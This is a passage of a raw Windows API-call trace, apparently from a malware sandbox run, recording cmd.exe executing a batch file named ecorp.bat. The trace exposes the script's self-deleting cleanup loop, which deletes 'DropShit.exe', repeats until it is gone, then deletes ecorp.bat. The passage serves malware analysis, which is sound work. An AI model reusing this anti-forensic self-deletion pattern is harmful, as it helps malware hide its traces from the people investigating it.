GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d180 | out: hHeap=0x250000) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251d30 | out: hHeap=0x250000) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf10 | out: hHeap=0x250000) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251ac0 | out: hHeap=0x250000) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a60 | out: hHeap=0x250000) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a00 | out: hHeap=0x250000) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2519c0 | out: hHeap=0x250000) returned 1 [0091.788] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.788] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.821] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.821] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.821] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.821] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.821] SetConsoleInputExeNameW () returned 0x1 [0091.822] GetConsoleOutputCP () returned 0x1b5 [0091.822] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.822] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.822] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.822] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.822] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.822] GetProcessHeap () returned 0x250000 [0091.822] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.822] GetProcessHeap () returned 0x250000 [0091.822] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251980 | out: hHeap=0x250000) returned 1 [0091.822] GetProcessHeap () returned 0x250000 [0091.822] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.822] GetProcessHeap () returned 0x250000 [0091.822] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.822] GetProcessHeap () returned 0x250000 [0091.822] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.822] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.822] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.822] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0091.823] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.823] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0091.823] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.823] GetFileType (hFile=0x5c) returned 0x1 [0091.823] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.823] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.823] GetProcessHeap () returned 0x250000 [0091.823] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.823] GetProcessHeap () returned 0x250000 [0091.823] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.823] GetProcessHeap () returned 0x250000 [0091.823] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x2518c0 [0091.823] GetProcessHeap () returned 0x250000 [0091.823] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0091.823] GetProcessHeap () returned 0x250000 [0091.823] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x2645e0 [0091.823] GetProcessHeap () returned 0x250000 [0091.823] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2645e0, Size=0x1e) returned 0x264610 [0091.823] GetProcessHeap () returned 0x250000 [0091.823] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x264610) returned 0x1e [0091.823] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0091.823] GetProcessHeap () returned 0x250000 [0091.823] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x251980 [0091.823] GetProcessHeap () returned 0x250000 [0091.823] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x2645e0 [0091.823] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0091.823] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0091.824] GetProcessHeap () returned 0x250000 [0091.824] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0091.824] GetProcessHeap () returned 0x250000 [0091.824] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x251a40 [0091.824] GetProcessHeap () returned 0x250000 [0091.824] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251a40, Size=0x30) returned 0x251a40 [0091.824] GetProcessHeap () returned 0x250000 [0091.824] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251a40) returned 0x30 [0091.824] GetProcessHeap () returned 0x250000 [0091.824] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x251a80 [0091.824] GetProcessHeap () returned 0x250000 [0091.824] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0091.824] GetProcessHeap () returned 0x250000 [0091.824] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0091.824] _tell (_FileHandle=3) returned 66 [0091.824] _close (_FileHandle=3) returned 0 [0091.824] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.824] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.824] GetFileType (hFile=0x7) returned 0x2 [0091.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.825] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.825] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.825] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.825] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.825] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.825] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.825] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.825] GetFileType (hFile=0x7) returned 0x2 [0091.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.825] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.826] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.826] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.826] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0091.826] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.826] GetFileType (hFile=0x7) returned 0x2 [0091.826] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.826] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.826] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.826] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0091.826] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0091.826] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.826] GetFileType (hFile=0x7) returned 0x2 [0091.827] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.827] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0091.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.827] GetFileType (hFile=0x7) returned 0x2 [0091.827] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.827] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0091.828] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0091.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.828] GetFileType (hFile=0x7) returned 0x2 [0091.828] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.828] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.828] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0091.828] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.828] GetFileType (hFile=0x7) returned 0x2 [0091.829] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.829] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.829] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.829] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0091.829] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0091.829] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x251b40 [0091.829] FindClose (in: hFindFile=0x251b40 | out: hFindFile=0x251b40) returned 1 [0091.829] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.829] GetProcessHeap () returned 0x250000 [0091.829] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0091.829] GetProcessHeap () returned 0x250000 [0091.829] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0091.829] GetProcessHeap () returned 0x250000 [0091.829] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0091.829] GetProcessHeap () returned 0x250000 [0091.830] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0091.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.830] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.830] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.830] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.830] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.830] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0091.830] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.830] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.830] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.830] GetFileType (hFile=0x5c) returned 0x1 [0091.830] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.830] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0091.830] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0091.830] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.830] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.830] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.830] GetFileType (hFile=0x5c) returned 0x1 [0091.830] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.830] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0091.830] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.830] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.830] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.830] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.831] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.831] GetFileType (hFile=0x5c) returned 0x1 [0091.831] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.831] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0091.831] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.831] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0091.831] _close (_FileHandle=3) returned 0 [0091.831] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.831] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.831] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.831] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.831] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.831] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.831] SetConsoleInputExeNameW () returned 0x1 [0091.831] GetConsoleOutputCP () returned 0x1b5 [0091.832] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.832] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.832] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.832] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.832] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a80 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a40 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251980 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.832] GetProcessHeap () returned 0x250000 [0091.832] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.833] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.833] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.833] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0091.833] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.833] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0091.833] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.833] GetFileType (hFile=0x5c) returned 0x1 [0091.833] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.833] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.833] GetProcessHeap () returned 0x250000 [0091.833] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.833] GetProcessHeap () returned 0x250000 [0091.833] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.833] GetProcessHeap () returned 0x250000 [0091.833] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x2518c0 [0091.833] GetProcessHeap () returned 0x250000 [0091.833] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0091.833] GetProcessHeap () returned 0x250000 [0091.833] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0091.833] _tell (_FileHandle=3) returned 29 [0091.834] _close (_FileHandle=3) returned 0 [0091.834] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.834] GetFileType (hFile=0x7) returned 0x2 [0091.834] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.834] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.834] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.834] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.834] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.834] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.834] GetFileType (hFile=0x7) returned 0x2 [0091.835] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.835] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.835] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.835] GetFileType (hFile=0x7) returned 0x2 [0091.835] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.835] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0091.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.836] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0091.836] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0091.836] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.836] GetFileType (hFile=0x7) returned 0x2 [0091.836] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.836] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.836] _get_osfhandle 